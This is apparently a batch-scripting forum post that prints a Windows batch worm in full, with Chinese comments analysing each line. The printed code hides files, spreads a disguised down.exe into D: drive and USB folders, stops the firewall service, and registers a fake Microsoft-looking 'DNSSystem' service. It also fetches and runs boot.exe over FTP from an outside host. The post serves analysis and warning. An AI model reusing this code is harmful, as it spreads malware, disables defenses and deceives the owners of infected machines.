del C:\WINDOWS\system32\a.txt,C:\WINDOWS\system32\b.txt,C:\WINDOWS\system32\c.txt,C:\WINDOWS\system32\d.txt
::删除a、b、c、d四个文档,应该是临时文件,没见到内容。
ATTRIB C:\WINDOWS\system32\mail3.vbe +s +h & ATTRIB C:\WINDOWS\system32\Attusb.dll +s +h & ATTRIB C:\WINDOWS\system32\autousb.bat +s +h & ATTRIB C:\WINDOWS\system32\WIN.bat +s +h
::给几个病毒文件添加隐藏和系统属性:mail3.vbe、Attusb.dll、autousb.bat、WIN.bat
::看英文名称大概懂得它们的作用。
dir d:\ /a:d-s /b > %SystemRoot%\system32\ok.txt
::多余的一个步骤:获得D盘的文件夹
for /f "delims=" %%q in (%SystemRoot%\system32\ok.txt) do (
ATTRIB "d:\%%q" +s +h & copy %SystemRoot%\system32\down.exe "d:\%%q.exe"
)
)
del %0
::隐藏D盘文件夹,并拷贝病毒文件down.exe进去,伪装成原来的文件夹。
::最后删掉本程序。不懂怎么多了一个括号,看来这家伙学艺不精。
start "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http : // www .kkk8. org
::后台打开某个网页,估计是病毒网站,不要随便打开!
@ dir %SystemRoot%\system32 |find "SuCH0ST.exe"
::搜索SuCH0ST.exe?搞不懂,没必要这样麻烦吧?SuCH0ST.exe有点模仿系统进程的意味!~
@ if %ERRORLEVEL%==0 goto ok
@ if %ERRORLEVEL%==1 goto end
::不喜欢用返回码,用&&和||更好。
::不喜欢一堆@头……,一个@echo off的事……
k
::我总觉得这样的临时文件和标签很有我早期写BAT的风格,难道是我的粉……?!
@ net stop sharedaccess
sc stop sharedaccess
::停用系统防火墙服务:sharedaccess
^c^o^p^y ^c^m^d^.^e^x^e ^S^V^C^H^0^S^.^e^x^e /y
::这种用法没接触过,有点那个……
@ cmd /c sc create DNSSystem binpath= "%systemroot%\system32\SVCH0S /c start SuCH0ST.exe " start= auto
@ cmd /c sc config DNSSystem displayname= "System DNS"
@ cmd /c sc config DNSSystem type= interact type= own
@ cmd /c sc description DNSSystem "(C) Microsoft Corporation 公司提供的(DNS)域名解析程序,如果该服务被停用,任何依赖它的服务将无法启动。"
@ sc start DNSSystem
::无非是山寨服务项:DNSSystem
%SystemRoot%\system32\SuCH0ST.exe
@ exit
::运行SuCH0ST.exe并退出此程序。
:end
@ net stop sharedaccess
sc stop sharedaccess
del boot.exe /q
::这个boot.exe是干嘛用的?
echo o kkksunhopp.3322.org > 1.RMVB&echo 1234 >> 1.RMVB&echo 1234 >> 1.RMVB&echo get boot.exe boot.exe >> 1.RMVB&echo del down.exe >> 1.RMVB&echo bye >> 1.RMVB
::写了几条信息到文件 1.RMVB 中,搞嘛?
ftp -s:1.RMVB
del 1.RMVB
::ftp并删除
ping 127.0.0.1 -n 3
cmd /c boot.exe
ping 127.0.0.1 -n 10
del %SystemRoot%\system32\boot.exe /q
exit
::间隔运行boot.exe,这个就是隐藏后台运行的家伙。
setlocal EnableDelayedExpansion
:1
fsutil fsinfo drives >%SystemRoot%\system32\output.txt
find ":\" < %SystemRoot%\system32\output.txt >%SystemRoot%\system32\out.txt
del %SystemRoot%\system32\output.txt /q
for /f %%i in (%SystemRoot%\system32\out.txt) do (
fsutil fsinfo drivetype %%i|find "可移动驱动器" &&echo %%i>>%SystemRoot%\system32\output.txt
)
::无非是获得可移动驱动器——U盘。
if not exist %SystemRoot%\system32\output.txt goto 3
for /f %%r in (%SystemRoot%\system32\output.txt) do (
set var=%%r
cd /d !var!
dir /a:d-s /b > %SystemRoot%\system32\ok.txt
for /f "delims=" %%q in (%SystemRoot%\system32\ok.txt) do (
ATTRIB "%%q" +s +h & copy %SystemRoot%\system32\down.exe "!var!%%q.exe"
)
)
::同上,将病毒伪装成U盘文件夹。
:3
EXPL0RER /n 10 127.0.1 &goto 1
::定位?估计又被山寨了,这个EXPL0RER中间是数字0,而非字母O!!不懂干嘛用的。
欢迎光临 批处理之家 (http://www.bathome.net/) | Powered by Discuz! 7.2 |